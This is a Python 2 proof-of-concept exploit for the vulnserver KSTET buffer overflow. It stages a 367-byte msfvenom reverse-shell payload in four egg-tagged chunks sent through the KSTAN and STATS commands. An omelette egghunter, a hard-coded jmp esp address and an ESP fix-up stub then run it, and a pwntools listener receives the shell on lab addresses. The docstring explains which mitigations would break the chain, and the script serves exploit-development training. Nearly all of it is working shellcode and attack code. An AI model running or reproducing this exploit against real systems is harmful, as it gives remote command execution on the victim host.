kstet-omelette-egghunter-exploit.py
"""Proof-of-concept for the vulnserver ``KSTET`` command, staged through an
"omelette" egghunter.

This is a Python 2 script: it uses the ``print`` statement and concatenates
``str`` and ``bytes`` freely, so it will not run unmodified under Python 3.

How the pieces relate, as far as this file shows:

* ``buf``      -- 16-byte NOP sled followed by the 351-byte msfvenom
  ``windows/shell_reverse_tcp`` payload (LHOST 192.168.116.199, LPORT 443,
  shikata_ga_nai encoded to avoid null bytes); 367 bytes in total.
* ``egg``      -- the 53-byte omelette egghunter; its tag ``MNAB``
  (0x4d 0x4e 0x41 0x42) is visible inside the bytes.
* ``chunk1-4`` -- ``buf`` split into 91/91/91/94-byte pieces, each prefixed
  with the tag, a flag byte and a size byte, and planted in the process over
  two earlier connections (``KSTAN`` and ``STATS``).
* ``poc``      -- the overlong ``KSTET`` request: NOP, CLD, the hunter,
  padding up to offset 76, a ``jmp esp`` address from essfunc.dll and a
  short ESP fix-up stub.

Defensive reading: the chain depends on (a) the KSTET handler accepting more
input than its buffer holds, (b) a module (essfunc.dll) that the gadget note
below records as non-ASLR, non-rebased and without SafeSEH, so the
``jmp esp`` address is stable, and (c) executable stack memory, since
``jmp esp`` runs code out of the overflowed buffer. Bounds-checking the
command parser, building every module with ASLR and SafeSEH, and enforcing
DEP would each break one of those steps. All addresses are RFC 1918 lab
addresses.
"""
from pwn import *
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.116.199 LPORT=443 -b '\x00' -f python > shell.rev
#x86/shikata_ga_nai succeeded with size 351 (iteration=0)
#x86/shikata_ga_nai chosen with final size 351
#Payload size: 351 bytes + 16 bytes
buf = b""
# 16-byte NOP sled -- the "+ 16 bytes" in the msfvenom note above.
buf += b"\x90" * 16
# 351 bytes of shikata_ga_nai encoder output; not readable as-is.
buf += b"\xda\xd5\xb8\xae\x9f\xfc\x42\xd9\x74\x24\xf4\x5b\x29"
buf += b"\xc9\xb1\x52\x83\xeb\xfc\x31\x43\x13\x03\xed\x8c\x1e"
buf += b"\xb7\x0d\x5a\x5c\x38\xed\x9b\x01\xb0\x08\xaa\x01\xa6"
buf += b"\x59\x9d\xb1\xac\x0f\x12\x39\xe0\xbb\xa1\x4f\x2d\xcc"
buf += b"\x02\xe5\x0b\xe3\x93\x56\x6f\x62\x10\xa5\xbc\x44\x29"
buf += b"\x66\xb1\x85\x6e\x9b\x38\xd7\x27\xd7\xef\xc7\x4c\xad"
buf += b"\x33\x6c\x1e\x23\x34\x91\xd7\x42\x15\x04\x63\x1d\xb5"
buf += b"\xa7\xa0\x15\xfc\xbf\xa5\x10\xb6\x34\x1d\xee\x49\x9c"
buf += b"\x6f\x0f\xe5\xe1\x5f\xe2\xf7\x26\x67\x1d\x82\x5e\x9b"
buf += b"\xa0\x95\xa5\xe1\x7e\x13\x3d\x41\xf4\x83\x99\x73\xd9"
buf += b"\x52\x6a\x7f\x96\x11\x34\x9c\x29\xf5\x4f\x98\xa2\xf8"
buf += b"\x9f\x28\xf0\xde\x3b\x70\xa2\x7f\x1a\xdc\x05\x7f\x7c"
buf += b"\xbf\xfa\x25\xf7\x52\xee\x57\x5a\x3b\xc3\x55\x64\xbb"
buf += b"\x4b\xed\x17\x89\xd4\x45\xbf\xa1\x9d\x43\x38\xc5\xb7"
buf += b"\x34\xd6\x38\x38\x45\xff\xfe\x6c\x15\x97\xd7\x0c\xfe"
buf += b"\x67\xd7\xd8\x51\x37\x77\xb3\x11\xe7\x37\x63\xfa\xed"
buf += b"\xb7\x5c\x1a\x0e\x12\xf5\xb1\xf5\xf5\x3a\xed\x81\xc2"
buf += b"\xd3\xec\x69\xcc\x98\x78\x8f\xa4\xce\x2c\x18\x51\x76"
buf += b"\x75\xd2\xc0\x77\xa3\x9f\xc3\xfc\x40\x60\x8d\xf4\x2d"
buf += b"\x72\x7a\xf5\x7b\x28\x2d\x0a\x56\x44\xb1\x99\x3d\x94"
buf += b"\xbc\x81\xe9\xc3\xe9\x74\xe0\x81\x07\x2e\x5a\xb7\xd5"
buf += b"\xb6\xa5\x73\x02\x0b\x2b\x7a\xc7\x37\x0f\x6c\x11\xb7"
buf += b"\x0b\xd8\xcd\xee\xc5\xb6\xab\x58\xa4\x60\x62\x36\x6e"
buf += b"\xe4\xf3\x74\xb1\x72\xfc\x50\x47\x9a\x4d\x0d\x1e\xa5"
buf += b"\x62\xd9\x96\xde\x9e\x79\x58\x35\x1b\x89\x13\x17\x0a"
buf += b"\x02\xfa\xc2\x0e\x4f\xfd\x39\x4c\x76\x7e\xcb\x2d\x8d"
buf += b"\x9e\xbe\x28\xc9\x18\x53\x41\x42\xcd\x53\xf6\x63\xc4"
#Omelette EggHunter (53 bytes) "MNAB" 4x chunks (367 bytes = 91, 91, 91, 94)
# The tag is embedded in the hunter as \x4d\x4e\x41\x42 ("MNAB") on the second
# line; \xaf (scasd) is the compare step and \xf3\xa4 (rep movsb) the copy step.
egg = (
"\x89\xe5\x66\x81\xcb\xff\x0f\x43\x31\xc0\xb0\x02\x89\xda"
"\xcd\x2e\x3c\x05\x74\xee\xb8\x4d\x4e\x41\x42\x89\xdf\xaf"
"\x75\xe9\xaf\x75\xe6\x89\xfe\x89\xef\x66\xad\x31\xc9\x88"
"\xe1\x3c\x01\xf3\xa4\x89\xfd\x75\xd4\xff\xe4"
)
#Pre-generate Chunks - prepend tag, flag, size
# Each chunk = "MNABMNAB" (double tag) + flag byte + size byte + data.
# The size byte equals the slice length: 0x5b == 91 for chunks 1-3 and
# 0x5e == 94 for the last one (buf[273:367]). The flag is 0x02 for the first
# three chunks and 0x01 for the final one -- presumably "more follows" vs
# "last chunk"; the hunter's protocol is not documented here, TODO confirm.
chunk1 = "MNABMNAB"+"\x02\x5b"+buf[91*0:91*1]
chunk2 = "MNABMNAB"+"\x02\x5b"+buf[91*1:91*2]
chunk3 = "MNABMNAB"+"\x02\x5b"+buf[91*2:91*3]
chunk4 = "MNABMNAB"+"\x01\x5e"+buf[91*3:(91*4)+3]
#0x625011af : jmp esp | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Documents and Settings\XPXP\Desktop\vulnserver-master\vulnserver-master\essfunc.dll)
# Return target. The gadget note above records essfunc.dll as non-ASLR,
# non-rebased and without SafeSEH, which is why a hard-coded address is
# usable at all; enabling those mitigations for the module would invalidate it.
jmpesp = p32(0x625011af)
# ESP fix-up stub, reached through the jmp esp. It copies ESP to EDX, rewrites
# only DH (bits 8-15) to 0xFC and copies it back, so ESP is moved to a
# different region before jumping to EAX+0x0a. What EAX holds at that point
# is not visible in this file; presumably the start of the received request,
# so that EAX+0x0a skips the 10-byte "KSTET /.:/" prefix and lands on the
# NOP/CLD/egghunter bytes -- TODO confirm.
fixesp = (
"\xcc" # INT3 (software breakpoint)
"\x83\xc0\x0a" # add eax,byte +0xa
"\x54" # PUSH ESP
"\x5A" # POP EDX
"\xB6\xFC" # MOV DH,0FC
"\x52" # PUSH EDX
"\x5c" # POP ESP
"\xff\xe0" # JMP EAX
)
poc = b"KSTET /.:/" # 10-byte command prefix
poc += "\x90" # NOP
poc += "\xfc" # CLD instruction (DF=0, so the hunter's scasd / rep movsb walk forwards)
poc += egg
# Pad to offset 76 (66 bytes past the 10-byte prefix). Only NOP+CLD+hunter
# (55 bytes) fit before that slot, which is why the 367-byte payload is
# staged separately and located by the hunter.
poc += b"A" * ((66 + 10) - len(poc))
poc += jmpesp # presumably overwrites the saved return address -- not shown here
poc += fixesp # if so, this is where ESP points after the return, i.e. the jmp esp target
poc += b"C" * ((5000 + 10) - len(poc)) # fill to 5010 bytes
# Listener for the reverse shell; the port matches LPORT=443 in the msfvenom note.
l = listen(443)
#Setup
# Plant the four tagged chunks in the target process over two separate
# connections (KSTAN, then STATS). A "BEEFn" marker precedes each chunk; its
# purpose is not stated here (presumably a locator for memory inspection).
r = remote('192.168.116.178', 9999)
print r.recvline() # consume the first line the server sends
r.send("KSTAN " + "BEEF1" + chunk1 + "BEEF2" + chunk2)
r.close()
r = remote('192.168.116.178', 9999)
print r.recvline()
r.send("STATS " + "BEEF3" + chunk3 + "BEEF4" + chunk4)
r.close()
#Exploit
# Send the overlong KSTET request built above.
r = remote('192.168.116.178', 9999)
print r.recvline()
r.send(poc)
r.close()
# Wait for the reverse shell to connect back and read its first line, then
# hand the session to the operator.
l.recvline()
l.interactive()
l.close()